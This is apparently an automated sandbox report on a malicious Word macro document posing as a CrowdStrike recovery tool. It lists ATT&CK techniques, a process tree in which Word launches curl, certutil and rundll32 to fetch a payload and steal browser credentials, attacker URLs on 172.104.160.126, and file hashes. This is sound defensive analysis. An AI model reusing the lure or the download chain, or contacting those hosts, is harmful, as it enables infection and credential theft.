  • Execution: Windows Management Instrumentation (1); Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
  • Persistence: Scripting (32); Obfuscated Files or Information (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
  • Privilege Escalation: DLL Side-Loading (1); Extra Window Memory Injection (1); Process Injection (111); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
  • Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (12); DLL Side-Loading (1); File Deletion (1); Extra Window Memory Injection (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (111); Rundll32 (1)
  • Credential Access: OS Credential Dumping (2); Credentials In Files (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
  • Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (36); Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (2); System Network Configuration Discovery (1); System Owner/User Discovery; Network Sniffing; Network Service Discovery
  • Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
  • Collection: Archive Collected Data (12); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
  • Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (3); Application Layer Protocol (5); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
  • Impact: Data Encrypted for Impact (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1478411, Sample: New_Recovery_Tool_to_help_w..., Startdate: 22/07/2024, Architecture: WINDOWS, Score: 100
Signatures on the sample: Multi AV Scanner detection for submitted file; Document contains VBA stomped code (only p-code) potentially bypassing AV detection; Machine Learning detection for dropped file; 8 other signatures
  • WINWORD.EXE (162 473)
      Signature: Office process queries suspicious COM object (likely to drop second stage)
      • cmd.exe (1)
          • curl.exe (2)
              Network: 172.104.160.126, 49717, 49724, 49725 LINODE-APLinodeLLCUS United States
              Dropped: C:\Users\user\AppData\Local\...\mscorsvc.txt, PEM
          • rundll32.exe
              • rundll32.exe (37)
                  Signature: Contains functionality to steal Chrome passwords or cookies
                  • cmd.exe (1)
                      • conhost.exe
                      • taskkill.exe
          • certutil.exe (2)
              Dropped: C:\Users\user\AppData\Local\Temp\curl.txt, PEM
          • 4 other processes
              Dropped: C:\Users\user\AppData\Local\...\mscorsvc.dll, PE32+
              Dropped: C:\Users\user\AppData\Local\Temp\curl.exe, PE32
  • WINWORD.EXE
      Dropped: C:\Users\user\AppData\Local\...\~WRC0000.tmp, Microsoft
      • cmd.exe
          • rundll32.exe
              • rundll32.exe
                  Signature: System process connects to network (likely due to code injection or exploit)
                  Signature: Tries to harvest and steal browser information (history, passwords, etc)
                  • cmd.exe
                      • conhost.exe
                      • taskkill.exe
          • conhost.exe
          • xcopy.exe
          • 4 other processes
  • chrome.exe
      Network: 192.168.2.6, 443, 49703, 49714 unknown unknown
      Network: 239.255.255.250 unknown Reserved
      Dropped: C:\...\MsftRecoveryToolForCSv2.zip (copy), Zip
      • chrome.exe
          Network: www.google.com 142.250.186.164 GOOGLEUS United States
  • chrome.exe

Source | Detection | Scanner | Label
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | 26% | ReversingLabs | Script-Macro.Downloader.Heuristic
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\curl.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\mscorsvc.dll | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://172.104.160.126:8099/payload2.txt6ov | 0% | Avira URL Cloud | safe
https://curl.se/libcurl/c/curl_easy_setopt.html | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://172.104.160.126:80X99 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099 | 0% | Avira URL Cloud | safe
https://curl.se/docs/http-cookies.html | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://172.104.160. | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txt-oC: | 0% | Avira URL Cloud | safe
https://curl.se/docs/alt-svc.html | 0% | Avira URL Cloud | safe
http://172.104.160.126:5000/Upl | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txton | 0% | Avira URL Cloud | safe
https://curl.se/docs/sslcerts.html | 0% | Avira URL Cloud | safe
http://172.104.160.126:5000/Uploadss | 0% | Avira URL Cloud | safe
https://curl.se/docs/alt-svc.html# | 0% | Avira URL Cloud | safe
https://curl.se/docs/hsts.html | 0% | Avira URL Cloud | safe
https://curl.se/docs/sslcerts.htmlcurl | 0% | Avira URL Cloud | safe
https://aka.ms/vs/17/release/vc_redist.x64.exe | 0% | Avira URL Cloud | safe
https://curl.se/docs/copyright.htmlD | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/pay | 0% | Avira URL Cloud | safe
https://curl.se/docs/hsts.html# | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/pay0 | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txtr | 0% | Avira URL Cloud | safe
https://curl.se/docs/http-cookies.html# | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txt6 | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txts | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txt | 0% | Avira URL Cloud | safe
https://curl.se/P | 0% | Avira URL Cloud | safe
http://172.104.160.126:8099/payload2.txto | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.186.164 | true | false | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    http://172.104.160.126:5000/Uploadss | true | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txt | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://duckduckgo.com/chrome_newtab | V2ViIERhdGE=.16.dr | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txt6ov | curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://curl.se/libcurl/c/curl_easy_setopt.html | curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
    https://duckduckgo.com/ac/?q= | V2ViIERhdGE=.16.dr | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099 | vbaProject.bin | true | Avira URL Cloud: safe | unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | V2ViIERhdGE=.16.dr | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/http-cookies.html | curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:80X99 | vbaProject.bin | false | Avira URL Cloud: safe | unknown
    http://172.104.160. | ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr | true | Avira URL Cloud: safe | unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | V2ViIERhdGE=.16.dr | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txt-oC: | curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | V2ViIERhdGE=.16.dr | false | URL Reputation: safe | unknown
    http://172.104.160.126:5000/Upl | rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/alt-svc.html | certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
    https://www.ecosia.org/newtab/ | V2ViIERhdGE=.16.dr | false | URL Reputation: safe | unknown
    https://curl.se/docs/sslcerts.html | curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/sslcerts.htmlcurl | curl.exe | false | Avira URL Cloud: safe | unknown
    https://ac.ecosia.org/autocomplete?q= | V2ViIERhdGE=.16.dr | false | URL Reputation: safe | unknown
    https://curl.se/docs/hsts.html | curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txton | curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://aka.ms/vs/17/release/vc_redist.x64.exe | document.xml | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/alt-svc.html# | rundll32.exe | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/copyright.htmlD | xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/pay | curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    https://curl.se/docs/hsts.html# | curl.exe | false | Avira URL Cloud: safe | unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | V2ViIERhdGE=.16.dr | false | URL Reputation: safe | unknown
    http://172.104.160.126:8099/payload2.txtr | curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/pay0 | curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txts | curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://curl.se/P | xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
    https://curl.se/docs/http-cookies.html# | curl.exe | false | Avira URL Cloud: safe | unknown
    http://172.104.160.126:8099/payload2.txt6 | curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | V2ViIERhdGE=.16.dr | false | URL Reputation: safe | unknown
    http://172.104.160.126:8099/payload2.txto | curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    239.255.255.250 | unknown | Reserved | unknown | unknown | false
    172.104.160.126 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
    142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false
    IP (private): 192.168.2.6
    Joe Sandbox version: 40.0.0 Tourmaline
    Analysis ID: 1478411
    Start date and time: 2024-07-22 15:56:51 +02:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 12m 59s
    Hypervisor based Inspection enabled: false
    Report type: light
    Cookbook file name: defaultwindowsofficecookbook.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name: Potential for more IOCs and behavior
    Number of analysed new started processes analysed: 40
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    Detection: MAL
    Classification: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .docm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Browse link: https://go.microsoft.com/fwlink/?linkid=2280386
    • Scroll down
    • Close Viewer
    • Override analysis time to 240s for rundll32
    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
    • HTTP Packets have been reduced
    • TCP Packets have been reduced to 100
    • Created / dropped Files have been reduced to 100
    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 192.229.221.95, 52.111.243.40, 52.111.243.42, 52.111.243.41, 52.111.243.43, 199.232.214.172, 51.105.71.136, 52.109.28.47, 95.101.111.168, 95.101.111.179, 2.18.64.220, 2.18.64.224, 142.250.184.227, 142.250.185.206, 34.104.35.123, 74.125.71.84, 184.28.89.167, 23.212.89.111, 52.109.28.48, 20.189.173.2, 52.111.231.26, 52.111.231.25, 52.111.231.24, 52.111.231.23, 20.42.73.26
    • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, odc.officeapps.live.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, mobile.events.data.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, ocsp.digicert.com, login.live.com, download.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, main.dl.ms.akadns.net, onedscolprdeus09.eastus.cloudapp.azure.com, officeclient.microsoft.com, download.microsoft.com, ukw-azsc-config.officeapps.live.com, ecs.office.com, fs.microsoft.com, onedscolprduks00.uksouth.cloudapp.azure.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, nleditor.osi.office.net, uks-azsc-000.roaming.officeapps.live.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, eur
    • Not all processes were analyzed; the report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Report size getting too big, too many NtSetValueKey calls found.
    • VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    No simulations
    No context
    Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type: JSON data
    Category: dropped
    Size (bytes): 521377
    Entropy (8bit): 4.9084889265453135
    Encrypted: false
    SSDEEP: 3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
    MD5: C37972CBD8748E2CA6DA205839B16444
    SHA1: 9834B46ACF560146DD7EE9086DB6019FBAC13B4E
    SHA-256: D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
    SHA-512: 02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
    Malicious: false
    Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
    Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type: TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
    Category: dropped
    Size (bytes): 773040
    Entropy (8bit): 6.55939673749297
    Encrypted: false
    SSDEEP: 12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
    MD5: 4296A064B917926682E7EED650D4A745
    SHA1: 3953A6AA9100F652A6CA533C2E05895E52343718
    SHA-256: E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
    SHA-512: A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
    Malicious: false
    Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
    Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type: XML 1.0 document, ASCII text, with very long lines (1298), with no line terminators
    Category: modified
    Size (bytes): 1298
    Entropy (8bit): 5.077301845740677
    Encrypted: false
    SSDEEP: 24:2dtatFtAzXR0X5qBiX5qGXX5qyjX5qgZX5q4d3X5qsHX5qfYX5qO:cGEbRNBfGQyEg+4dwsgfJO
    MD5: 70EFA566464C23B4E36A63A2E54795F1
    SHA1: 71D018AAF38ED9178717D2871810F8FDF4A5FA88
    SHA-256: 186DF18340B77010991449EA87475CAE6651432084C1AFC7AFE5AEE779B42DDF
    SHA-512: BA840DF32DB645E461392400DA7F01AC57EB2F722D1A7C8AD22551D8B83FAB38EE69D328248871905791F23FA8604A48F7DBD3DDD231C3E506B5D5C1134C5712
    Malicious: false
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>8</Count><Resource><Id>inkeffectsilver_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectsilver.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectrosegold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectrosegold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectlava_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectlava.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgalaxy_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgalaxy.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectbronze_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectbronze.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkef
    Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category: dropped
    Size (bytes): 51359
    Entropy (8bit): 7.951666710600864
    Encrypted: false
    SSDEEP: 1536:R0RcgzFbKPP60jIl5/IwaJczf3CtvRX5/wWi5:bgxbKPid/IwnzqJ5E5
    MD5: C78ADBD2D46B0E9C1D82F07CE097886C
    SHA1: FB1112D34E16E16AEE78EEDD4FC646ED9BE2AF93
    SHA-256: AEBFCC397AEF37AFE927595078B879AB56A3EEA1725B49E5716DEBCE74B8757C
    SHA-512: 0EE4D259906BA938FAF8C1A0ED1A77FB4AD16313839B8790955448F7219806B4B70BA318A359F4724031C62300D4A24E0C63CFEE233EF25B3AE907F5F09AB89B
    Malicious: false
    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:630AA0AD350711E7A8B5D05185B6C702" xmpMM:InstanceID="xmp.iid:630AA0AC350711E7A8B5D05185B6C702" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:93DCC65027C411E7BFED96D58044CBC1" stRef:documentID="xmp.did:93DCC65127C411E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............!.!4..4B/)/B=3223=FFFFFF
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):39125
    Entropy (8bit):7.979802521866709
    Encrypted:false
    SSDEEP:768:WCjr07kqJ96I8cTgooRTYWHj3FkbeP2rcZ7EHA6s5:507kq2SEo+TLjTw+7EHTe
    MD5:239B06776C5028E8696BE5DDE3056F40
    SHA1:5BA5F0F7762296CBC0A066608E611AAA4D386F75
    SHA-256:D8A45BC6BD592ED29DC7F74666B6C22D4ADDCA52261FDF2A929CE7205FC4EFCA
    SHA-512:7B5319E22DC8D422C9974A6DE23B094CCBC89861FFBBA85C5A19137B1A7CE3224E34978F2AF5777BB357571379B998DCBB30951DBEF32BBFE8C73929D2F90B86
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):45967
    Entropy (8bit):7.9705077862907885
    Encrypted:false
    SSDEEP:768:IuC14Fy5SyHdNNbx4IsRctKVqjrk+wiM6SNlM3jDbS+TFhNdc:IuC+RkRSjyxoPNl6DbSqhNdc
    MD5:041305375CE26DE66A1405C06819D3CD
    SHA1:4448296BBA3BD8ACF34D1AF5C4CFEBDFD6B07919
    SHA-256:4BB1E1D1139CAFDD96D4C98F78086B3677A68A90ABCACE31250F1442C9E528B0
    SHA-512:F15A172058470337F9EA00F5757A605A0A069A7C232BA6015B2839CEC27DCEA30E81BEFD811AC15D9B442648FFD9F07B82B1E104F86890C2F2680242EC32958A
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):46495
    Entropy (8bit):7.9661137194510605
    Encrypted:false
